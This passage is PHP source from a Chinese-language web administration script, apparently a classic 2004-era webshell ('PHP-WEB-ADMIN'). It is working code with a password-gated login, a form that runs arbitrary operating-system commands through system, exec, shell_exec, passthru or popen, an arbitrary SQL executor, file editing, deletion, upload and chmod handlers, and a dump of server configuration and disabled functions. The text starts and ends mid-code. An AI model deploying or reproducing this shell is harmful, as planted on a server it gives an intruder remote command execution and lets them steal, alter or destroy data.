 <form method="post" action="?action=sql" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">
   数据库地址:<input name="sqlhost" type="text" class="style1" value="<?=isset($sqlhost)?$sqlhost:"localhost"?>" size="20">
   端口:<input name="sqlport" type="text" class="style1" value="<?=isset($sqlport)?$sqlport:"3306"?>" size="5">
   用户名:<input name="sqluser" type="text" class="style1" value="<?=isset($sqluser)?$sqluser:"root"?>" size="10">
   密码:<input name="sqlpasd" type="text" class="style1" value="<?=isset($sqlpasd)?$sqlpasd:""?>" size="10">
   数据库名:<input name="sqldb" type="text" class="style1" value="<?=isset($sqldb)?$sqldb:""?>" size="10"><br>
   <textarea name="sqlcmdtext" cols="120" rows="10" class="style1"><?
    if(!empty($sqlcmdtext)){
     @mysql_connect("{$sqlhost}:{$sqlport}","$sqluser","$sqlpasd") or die("数据库连接失败");
     @mysql_select_db("$sqldb") or die("选择数据库失败");
     $res = @mysql_query("$sqlcmdtext");
     echo $sqlcmdtext;
     mysql_close();
    }
   ?></textarea><p>
   <span class="stylebtext2"><?echo isset($sqlcmdb)?($res?"执行成功.":"执行失败:".mysql_error()):"";?></span><p>
   <input name="sqlcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
   <input name="sqlagainb" type="reset" value="重置" class="style1">
   <p>
  </td>
 </form>
 </tr>
 </table>
<?}else if("shell" == substr($action,0,5)){?>
 Shell命令
 </td>
 </tr>

 <tr>
  <form method="post" action="?action=shell" enctype="multipart/form-data">
  <td align="center" valign="top" bgcolor="#EEEEEE">
   函数:<select name="seletefunc" class="input">
    <option value="system" <?=($seletefunc=="system")?"selected":"";?>>system</option>
    <option value="exec" <?=($seletefunc=="exec")?"selected":"";?>>exec</option>
    <option value="shell_exec" <?=($seletefunc=="shell_exec")?"selected":"";?>>shell_exec</option>
    <option value="passthru" <?=($seletefunc=="passthru")?"selected":"";?>>passthru</option>
    <option value="popen" <?=($seletefunc=="popen")?"selected":"";?>>popen</option>
   </select>
   命令:<input name="shellcmd" type="text" class="style1" value="<?=isset($shellcmd)?$shellcmd:""?>" size="80">
   <textarea name="shelltext" cols="120" rows="10" class="style1"><?
    if(!empty($shellcmd)){
     if($seletefunc=="popen"){
      $pp = popen($shellcmd, 'r');
      echo fread($pp, 2096);
      pclose($pp);
     }else{
      echo $out =  ("system"==$seletefunc)?system($shellcmd):(($seletefunc=="exec")?exec($shellcmd):(($seletefunc=="shell_exec")?shell_exec($shellcmd):(($seletefunc=="passthru")?passthru($shellcmd):system($shellcmd)))); 
     }
    }
   ?></textarea><p>
   <span class="stylebtext2"><?echo get_cfg_var("safe_mode")?"提示:安全模式下可能无法执行":"";?></span><p>
   <input name="shellcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
   <input name="shellagainb" type="reset" value="重置" class="style1">
   <p>
 </td>
 </form>
 </tr>
 </table>
<?}else if($action=="phpinfo"){?>
 PHP系统信息
 </td>
 </tr>

 <tr>
 <td align="center" bgcolor="#EEEEEE" class="stylebtext2"><br><?phpinfo();
  if(eregi("phpinfo",get_cfg_var("disable_functions"))) echo "<b>phpinfo函数被禁止</b><br>";
 ?><br>
 </td>
 </tr>
 </table>
<?}else if("file" == substr($action,0,4)){?>
 系统消息
 </td>
 </tr>

 <tr>
 <td align="center" bgcolor="#EEEEEE" class="stylebtext2">
 <br>
 <?
  if($action == "filesave"){
   if(isset($editfileb)&&isset($editfilename)){
    if(isset($editbackfile)&&($editbackfile == 1))
     echo $out = @copy($editfilename,$editfilename.".bak")?"生成备份文件成功.<p>":"生成备份文件成功<p>";
    $fd = @fopen($editfilename, "w");
    if($fd == false) echo "打开文件[$editfilename]错误.";
    else{
     echo $out=@fwrite($fd,$editfiletext)?"编辑文件[$editfilename]成功!":"写入文件文件[$editfilename]错误";
     @fclose( $fd );
    }
   }
  }else if($action == "filedel"){
   if(isset($deldir)) {
    echo $out = file_exists($deldir)?(deltree($deldir)?"删除目录[$deldir]成功!":"删除目录[$deldir]失败!"):"目录[$deldir]不存在!!";
   }else if(isset($delfile)){
    @chmod("$delfile", 0777);
    echo $out = file_exists($delfile)?(@unlink($delfile)?"删除文件[$delfile]成功!":"删除文件[$delfile]失败!"):"文件[$delfile]不存在!";
   }
  }else if($action == "filerename"){
   echo $out = file_exists($renamef)?(@rename($renamef,$renamet)?"重命名[$renamef]为[{$renamet}]成功":"重命名[$renamef]为[{$renamet}]失败"):"文件[$renamef]不存在!";
  }else if($action =="filecopy") {
   if(isset($copydirf)&&isset($copydirt)){
    echo $out = file_exists($copydirf)?(truepath($copydirt)?(copydir($copydirf,$copydirt)?"拷贝目录[$copydirf]到[$copydirt]成功":"拷贝目录[$copydirf]到[$copydirt]失败"):"目标目录[$copydirt]不存在且创建错误"):"目录[$copydirf]不存在!";
   }else if(isset($copyfilef)&&isset($copyfilet)){
    echo $out = file_exists($copyfilef)?(truepath(dirname($copyfilet))?(@copy($copyfilef,$copyfilet)?"拷贝文件[$copyfilef]到[$copyfilet]成功":"拷贝文件[$copyfilef]到[$copyfilet]失败"):"目标目录不存在且创建错误"):"源文件[$copyfilef]不存在!";
   }
  }else if($action == "filecreate"){
   if(isset($mkdirb)){
    echo $out = file_exists("$dir/$mkname")?"[{$dir}/{$mkname}]该目录已存在":(@mkdir("$dir/$mkname",0777)?"目录[$mkname]创建成功":"目录[$mkname]创建失败");
   }else if(isset($mkfileb)){
    if(file_exists("$dir/$mkname")) echo "[$dir/$mkname]该文件已存在";
    else{
     $fd = @fopen("$dir/$mkname", "w");
     if($fd == false) echo "建立文件[$mkname]错误.";
     else{
      echo "建立文件[$mkname]成功 <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($dir)."/".urlencode($mkname)."\"><p>点此跳转入编辑浏览页面</a>";
      @fclose( $fd );
     }
    }
   }
  }else if($action == "filetype"){
   echo $out=@chmod($cfile,base_convert($ctype,8,10))?"更改成功!":"更改失败!";
  }else if($action == "fileup"){
   echo  $out = @copy($userfile["tmp_name"],"{$filedir}/{$userfile['name']}")?"上传文件[{$userfile['name']}]成功.位置:[{$filedir}/{$userfile['name']}]共({$userfile['size']})字节.":"上传文件[{$userfile['name']}]失败";
  }else{
   echo "错误的提交参数action.";
  }
 ?>
 <p>
 <a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
 <p>
 </td>
 </tr>
 </table>

<?}else if($action=="env"){?>
 环境变量&nbsp;&nbsp;<?=$rny?>支持&nbsp;&nbsp;<?=$rnn?>不支持<br>
 </td>
 </tr>
 <?
 $sinfo[0] = array("主机域名:",$_SERVER["SERVER_NAME"]);
 $sinfo[1] = array("主机IP:",gethostbyname($_SERVER["SERVER_NAME"]));
 $sinfo[2] = array("主机端口:",$_SERVER["SERVER_PORT"]);
 $sinfo[3] = array("主机时间:",date("Y/m/d_h:i:s",time()));
 $sinfo[4] = array("主机系统:",PHP_OS);
 $sinfo[5] = array("主机WEB服务器",$_SERVER["SERVER_SOFTWARE"]);
 $sinfo[6] = array("PHP版本:",PHP_VERSION);
 $sinfo[7] = array("剩余空间:",intval(diskfreespace(".") / (1024 * 1024).'MB'));
 $sinfo[8] = array("主机语言",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
 $sinfo[9] = array("当前用户",get_current_user());
 $sinfo[10] = array("最大内存占用:",my_func("memory_limit",1));
 $sinfo[11] = array("最大单个上传文件",my_func("upload_max_filesize",1));
 $sinfo[12] = array("POST最大容量",my_func("post_max_size",1));
 $sinfo[13] = array("脚本超时",my_func("max_execution_time",1));
 $sinfo[14] = array("屏蔽的函数",my_func("disable_functions",1));

 $ssql[0] = array("MYSQL",my_func("mysql_close",2));
 $ssql[1] = array("Oracle",my_func("ora_close",2));
 $ssql[2] = array("Oracle 8",my_func("OCILogOff",2));
 $ssql[3] = array("OBDC",my_func("odbc_close",2));
 $ssql[4] = array("SyBase",my_func("sybase_close",2));
 $ssql[5] = array("SQL_Server",my_func("mssql_close",2));
 $ssql[6] = array("DBase",my_func("dbase_close",2));
 $ssql[7] = array("Hyperwave",my_func("hw_close",2));
 $ssql[8] = array("Postgre_SQL",my_func("pg_close",2));

 $sobj[0] = array("Session支持",my_func("session_start",2));
 $sobj[1] = array("Socket支持",my_func("fsockopen",2));
 $sobj[2] = array("压缩文件支持(Zlib)",my_func("gzclose",2));
 $sobj[3] = array("SMTP支持",my_func("smtp",2));
 $sobj[4] = array("XML支持",my_func("XML Support",3));
 $sobj[5] = array("FTP支持",my_func("FTP support",3));
 $sobj[6] = array("Sendmail支持",my_func("Internal Sendmail Support for Windows 4",3));
 $sobj[7] = array("SNMP支持",my_func("snmpget",2));
 $sobj[8] = array("PDF文档支持",my_func("pdf_close",2));
 $sobj[9] = array("IMAP电子邮件支持",my_func("imap_close",2));
 $sobj[10] = array("图形处理GD Library支持",my_func("imageline",2));
 $sobj[11] = array("ZEND支持",my_func("zend_version",2)."(".zend_version().")");

 $sobj[12] = array("允许使用URL打开文件",my_func("allow_url_fopen",2));
 $sobj[13] = array("PREL相容语法 PCRE",my_func("preg_match",2));
 $sobj[14] = array("显示错误信息",my_func("display_errors",2));
 $sobj[15] = array("自动定义全局变量",my_func("register_globals",2));
 $sobj[16] = array("PHP运行方式",strtoupper(php_sapi_name()));
 ?>

 <tr>
 <td align="center" bgcolor="#EEEEEE">
  <table width="600" border="0" cellpadding="0" cellspacing="0"><br>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">主机信息</td></tr>
   <?
   for($i=0;$i<15;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$sinfo[$i][0]}</td><td>{$sinfo[$i][1]}</td></tr>";  
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">数据库支持信息</td></tr>
   <?
   for($i=0;$i<9;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$ssql[$i][0]}</td><td>{$ssql[$i][1]}</td></tr>";  
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">组件和其他信息</td></tr>
   <?
   for($i=0;$i<17;$i++){
    $color=ch_color($color);
    echo "<tr bgcolor=\"$color\"><td>{$sobj[$i][0]}</td><td>{$sobj[$i][1]}</td></tr>";
   }
   ?>
   <tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">自定义查看PHP配置参数(多个参数可用","逗号隔开)</td></tr>
   <tr bgcolor="#EEEEEE">
   <form method="post" action="?action=env" enctype="multipart/form-data">
    <td colspan="2">请输入参数的ProgId或ClassId:
     <input name="envname" type="text" size="50" class="style1" value=<?=isset($envname)?$envname:"";?>>
     <input name="envnameb" type="submit" value="查看" class="style1">
    </td>
   </form>
   </tr>
   <?
    if(isset($envname)&&!empty($envname)){
     $envname=explode(",", $envname);
     $i=0;
     while($envname[$i]){
      echo "<tr bgcolor=\"#CCCCCC\"><td colspan=\"2\">查询[{$envname[$i]}]如下:</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_cfg_var方式</td><td>". my_func($envname[$i],1)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>function_exists方式</td><td>". my_func($envname[$i],2)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_gpc方式</td><td>". my_func($envname[$i],3)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_runtime方式</td><td>". my_func($envname[$i],4)."</td></tr>";
      echo "<tr bgcolor=\"#EEEEEE\"><td>Getenv方式</td><td>". my_func($envname[$i],5)."</td></tr>"; 
      $i++;
     }
    }
   ?>
  </table><br>
 </td>
 </tr>
 </table>
<?}else{
 echo "错误的提交参数</td></tr><tr><td align=\"center\" bgcolor=\"#EEEEEE\"><br><a href=\"?action=dir&dir=".urlencode($dir)."\">点此返回文件浏览页面</a><p></td></tr></table>";
}echoend();@ob_end_flush();?>

<?

function array_stripslashes(&$array) {
    while(list($key,$var) = each($array)) {
        if ((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv') {
            if (is_string($var)) $array[$key] = stripslashes($var);
            if (is_array($var)) $array[$key] = array_stripslashes($var); 
        }
    }
    return $array;
}

function deltree($TagDir){
 $mydir=@opendir($TagDir);
 while($file=@readdir($mydir)){
  if((is_dir("$TagDir/$file")) && ($file!=".") && ($file!="..")) {
   if(!deltree("$TagDir/$file")) return false;
  }else if(!is_dir("$TagDir/$file")){
   @chmod("$TagDir/$file", 0777);
   if(!@unlink("$TagDir/$file")) return false;
  }
 }
 @closedir($mydir);
 @chmod("$TagDir", 0777);
 if(!@rmdir($TagDir)) return false;
 return true;
}

function copydir($dirf,$dirt){
    $mydir=@opendir($dirf);
    while($file=@readdir($mydir)){
        if((is_dir("$dirf/$file")) && ($file!=".") && ($file!="..")) {
            if(!file_exists("$dirt/$file")) if(!@mkdir("$dirt/$file")) return false;
            if(!copydir("$dirf/$file","$dirt/$file")) return false;
        }else if(!is_dir("$dirf/$file")) if(!@copy("$dirf/$file","$dirt/$file")) return false;
    }
    return true;
}

function truepath($path){
 if(file_exists($path)) return true; 
 else{
  if(truepath(@dirname($path))){
   if(@mkdir($path)) return true;
   else return false;
  }else return false;
 }
}

function getpageruntime(){
    global $pagestarttime;
    $pagestarttime = explode(' ', $pagestarttime);
    $pageendtime = explode(' ',@microtime());
    return ($pageendtime[0]-$pagestarttime[0]+$pageendtime[1]-$pagestarttime[1]);
}

function echoend(){
    echo "<br><center>页面执行时间:".getpageruntime()." 秒<br>".
    "<span class = \"stylebtext2\">PHP-WEB-ADMIN(hopol版本)</span><br>脚本由 飘忽的幽灵 提供 <br>".
    "Copyright (C) 2004 www.18883.com All Rights Reserved.</center>";
}

function gettruepath($path){
    return str_replace("\\","/",@realpath($path));
}

function my_func($getname,$tp){
 global $rny, $rnn;
 $out = ($tp==1)?@get_cfg_var($getname):(($tp==2)?@function_exists($getname):(($tp==3)?@get_magic_quotes_gpc($getname):(($tp==4)?@get_magic_quotes_runtime($getname):(($tp==5)?@Getenv($getname):"error!"))));
 return ($out == 1)?$rny:(($out == 0)?$rnn:$out);
}

function ch_color($c){
 return $c=="#CCCCCC"?"#EEEEEE":"#CCCCCC";
}

function getloginpass(){
 ?>
 <br><br><br><br><br><br><br>
 <table align="center" width="300" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align="center" bgcolor="#000000" class="stylebtext3">
            幽灵老大,您回来了,请输入密码:
        </t